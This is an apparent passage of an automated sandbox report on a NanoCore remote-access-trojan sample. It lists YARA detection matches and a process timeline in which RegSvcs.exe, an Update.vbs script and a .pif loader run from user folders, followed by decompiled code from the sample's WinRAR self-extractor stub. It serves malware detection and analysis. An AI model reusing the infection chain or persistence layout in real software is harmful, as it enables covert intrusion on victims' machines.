            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

            Chronological Activities

            Analysis Process: RegSvcs.exe PID: 5572 Parent PID: 3032

            General

            Start time:12:16:59
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Imagebase:0xf30000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

            Chronological Activities

            Analysis Process: wscript.exe PID: 6664 Parent PID: 3352

            General

            Start time:12:17:00
            Start date:13/10/2021
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
            Imagebase:0x7ff6d16a0000
            File size:163840 bytes
            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Chronological Activities

            Analysis Process: bspmflqee.pif PID: 4732 Parent PID: 3352

            General

            Start time:12:17:14
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            Imagebase:0xf90000
            File size:777456 bytes
            MD5 hash:8E699954F6B5D64683412CC560938507
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

            Chronological Activities

            Analysis Process: RegSvcs.exe PID: 6540 Parent PID: 4732

            General

            Start time:12:17:19
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Imagebase:0x7ff6ccee0000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

            Chronological Activities

            Analysis Process: wscript.exe PID: 5104 Parent PID: 3352

            General

            Start time:12:17:22
            Start date:13/10/2021
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
            Imagebase:0x7ff6d16a0000
            File size:163840 bytes
            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Chronological Activities

            Disassembly

            Code Analysis

            Reset < >

              Analysis Process: ameHrrFwNp.exe PID: 5216 Parent PID: 5092 ameHrrFwNp.exeCOMMON

              Executed Functions

              Function 00D8CBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199filesleeptimeCOMMON
              Download Yara Rule
              C-Code - Quality: 17%
              			E00D8CBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E00D7FD49(__edx, 1);
				E00D895F8("C:\Users\hardz\Desktop", 0x800);
				E00D89AA0( &_v208); // executed
				E00D81017(0xdb7370);
				_t74 = 0;
				E00D8E920(0x7104, 0xdc5d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E00D8B356(0, _t110);
					if( *0xdb9601 == 0) {
						E00D8C891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0xdcce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xdcce18); // executed
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00D73E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0xdb0064 = _t97;
				 *0xdb0060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0xdbb704 = _t41;
				 *0xdc5d04 = E00D8A4F8(_t89, _t125);
				E00D7CFAB(0xdb0078, _t89, 0xdcce18);
				E00D883FC(0);
				E00D883FC(0);
				 *0xdb75e8 = _t107 + 0x5c;
				 *0xdb75ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E00D8A5D1, _t74); // executed
				 *0xdb75ec = _t74;
				 *0xdb75e8 = _t74;
				E00D884AE(_t107 + 0x24);
				E00D884AE(_t107 + 0x50);
				_t51 =  *0xdcde28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xdb85f8 != 0) {
					E00D89CA1(0xdcce18);
				}
				E00D7E797(0xdc5c00);
				if( *0xdb75e4 > 0) {
					L00D92B4E( *0xdb75e0);
				}
				DeleteObject( *0xdbb704);
				_t54 =  *0xdc5d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xdb00e0 == 0 &&  *0xdb75d7 != 0) {
					E00D76E03(0xdb00e0, 0xff);
				}
				_t55 =  *0xdcde2c;
				 *0xdb75d7 = 1;
				if( *0xdcde2c != 0) {
					E00D8C8F0(_t55);
					CloseHandle( *0xdcde2c);
				}
				_t99 =  *0xdb00e0; // 0x0
				if( *0xdcde21 != 0) {
					_t58 =  *0xdad5fc; // 0x3e8
					if( *0xdcde22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0xdcde24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00D89B08(_t107 + 0x1c); // executed
				return _t99;
			}




















              0x00d8cbb8
              0x00d8cbb8
              0x00d8cbc3
              0x00d8cbd2
              0x00d8cbdb
              0x00d8cbe5
              0x00d8cbef
              0x00d8cbf8
              0x00d8cbfd
              0x00d8cc06
              0x00d8cc08
              0x00d8cc0a
              0x00d8cc0c
              0x00d8cc0d
              0x00d8cc18
              0x00d8cc85
              0x00d8cc1a
              0x00d8cc2d
              0x00d8cc31
              0x00d8cc72
              0x00d8cc78
              0x00d8cc78
              0x00d8cc7b
              0x00d8cc81
              0x00d8cc18
              0x00d8cc96
              0x00d8cca8
              0x00d8ccaf
              0x00d8ccba
              0x00d8ccc0
              0x00d8ccc6
              0x00d8cccc
              0x00d8ccd2
              0x00d8ccd8
              0x00d8ccee
              0x00d8ccf3
              0x00d8cd00
              0x00d8cd09
              0x00d8cd0e
              0x00d8cd14
              0x00d8cd1a
              0x00d8cd20
              0x00d8cd30
              0x00d8cd35
              0x00d8cd3e
              0x00d8cd47
              0x00d8cd57
              0x00d8cd66
              0x00d8cd6b
              0x00d8cd75
              0x00d8cd7b
              0x00d8cd81
              0x00d8cd8a
              0x00d8cd8f
              0x00d8cd96
              0x00d8cd99
              0x00d8cd99
              0x00d8cda6
              0x00d8cda8
              0x00d8cda8
              0x00d8cdb2
              0x00d8cdbe
              0x00d8cdc6
              0x00d8cdcb
              0x00d8cdd8
              0x00d8cdda
              0x00d8cde1
              0x00d8cde4
              0x00d8cde4
              0x00d8cded
              0x00d8ce02
              0x00d8ce02
              0x00d8ce07
              0x00d8ce0c
              0x00d8ce15
              0x00d8ce18
              0x00d8ce23
              0x00d8ce23
              0x00d8ce30
              0x00d8ce36
              0x00d8ce3f
              0x00d8ce44
              0x00d8ce54
              0x00d8ce56
              0x00d8ce58
              0x00d8ce58
              0x00d8ce58
              0x00d8ce46
              0x00d8ce46
              0x00d8ce4e
              0x00d8ce50
              0x00d8ce50
              0x00d8ce4e
              0x00d8ce44
              0x00d8ce5e
              0x00d8ce6e

              APIs
                • Part of subcall function 00D7FD49: GetModuleHandleW.KERNEL32 ref: 00D7FD61
                • Part of subcall function 00D7FD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7FD79
                • Part of subcall function 00D7FD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7FD9C
                • Part of subcall function 00D895F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D89600
                • Part of subcall function 00D89AA0: OleInitialize.OLE32(00000000), ref: 00D89AB9
                • Part of subcall function 00D89AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89AF0
                • Part of subcall function 00D89AA0: SHGetMalloc.SHELL32(00DB75C0), ref: 00D89AFA
                • Part of subcall function 00D81017: GetCPInfo.KERNEL32(00000000,?), ref: 00D81028
                • Part of subcall function 00D81017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D8103C
              • GetCommandLineW.KERNEL32 ref: 00D8CC00
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D8CC27
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D8CC38
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00D8CC72
                • Part of subcall function 00D8C891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8C8A7
                • Part of subcall function 00D8C891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8C8E3
              • CloseHandle.KERNEL32(00000000), ref: 00D8CC7B
              • GetModuleFileNameW.KERNEL32(00000000,00DCCE18,00000800), ref: 00D8CC96
              • SetEnvironmentVariableW.KERNELBASE(sfxname,00DCCE18), ref: 00D8CCA8
              • GetLocalTime.KERNEL32(?), ref: 00D8CCAF
              • _swprintf.LIBCMT ref: 00D8CCEE
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D8CD00
              • GetModuleHandleW.KERNEL32(00000000), ref: 00D8CD03
              • LoadIconW.USER32(00000000,00000064), ref: 00D8CD1A
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00D8CD6B
              • Sleep.KERNEL32(?), ref: 00D8CD99
              • DeleteObject.GDI32 ref: 00D8CDD8
              • DeleteObject.GDI32(?), ref: 00D8CDE4
              • CloseHandle.KERNEL32 ref: 00D8CE23
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-586660713
              • Opcode ID: 1edbd59c36d38b1f2ca81af5aadd6716be6b5ea09022dca4683a3ced1b8b5165
              • Instruction ID: f11dfd279292ddceeeff29bed5004653ff3b809773d46c540bd429e46f78e1a9
              • Opcode Fuzzy Hash: 1edbd59c36d38b1f2ca81af5aadd6716be6b5ea09022dca4683a3ced1b8b5165
              • Instruction Fuzzy Hash: FD619E71904301EBD721BB65EC89F7B7BECEB8A700F044129F946D6391DAB49944CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92memorywindowCOMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E00D8963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0xdb0060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0xdb0060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xdb0060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E00D8EA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0xdadff8() == 0) {
						_t26 = E00D895CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L00D8D81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}





















              0x00d8964b
              0x00d89651
              0x00d89655
              0x00d89732
              0x00d89732
              0x00d89669
              0x00d8966d
              0x00d8968d
              0x00d8968d
              0x00d8972f
              0x00000000
              0x00d8972f
              0x00d89676
              0x00d8967e
              0x00000000
              0x00000000
              0x00d89681
              0x00d89687
              0x00d8968b
              0x00d8969b
              0x00d8969f
              0x00d896a5
              0x00d896a9
              0x00d89729
              0x00d89729
              0x00000000
              0x00d8972e
              0x00d896b4
              0x00d89722
              0x00d89723
              0x00000000
              0x00d89723
              0x00d896b9
              0x00d896c1
              0x00d896c9
              0x00d896ca
              0x00d896cb
              0x00d896d4
              0x00d896db
              0x00d896e0
              0x00d896e4
              0x00d896e9
              0x00d896ee
              0x00d896f3
              0x00d896f8
              0x00d896fa
              0x00d896ff
              0x00d89703
              0x00d89704
              0x00d89707
              0x00d8970e
              0x00d89710
              0x00d89710
              0x00d8970e
              0x00d89719
              0x00d89719
              0x00d896ee
              0x00d8971c
              0x00000000
              0x00d8971c
              0x00000000

              APIs
              • FindResourceW.KERNEL32(00000066,PNG,?,?,00D8A54A,00000066), ref: 00D8964B
              • SizeofResource.KERNEL32(00000000,76B95B70,?,?,00D8A54A,00000066), ref: 00D89663
              • LoadResource.KERNEL32(00000000,?,?,00D8A54A,00000066), ref: 00D89676
              • LockResource.KERNEL32(00000000,?,?,00D8A54A,00000066), ref: 00D89681
              • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00D8A54A,00000066), ref: 00D8969F
              • GlobalLock.KERNEL32 ref: 00D896AC
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D89707
              • GlobalUnlock.KERNEL32(00000000), ref: 00D8971C
              • GlobalFree.KERNEL32 ref: 00D89723
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
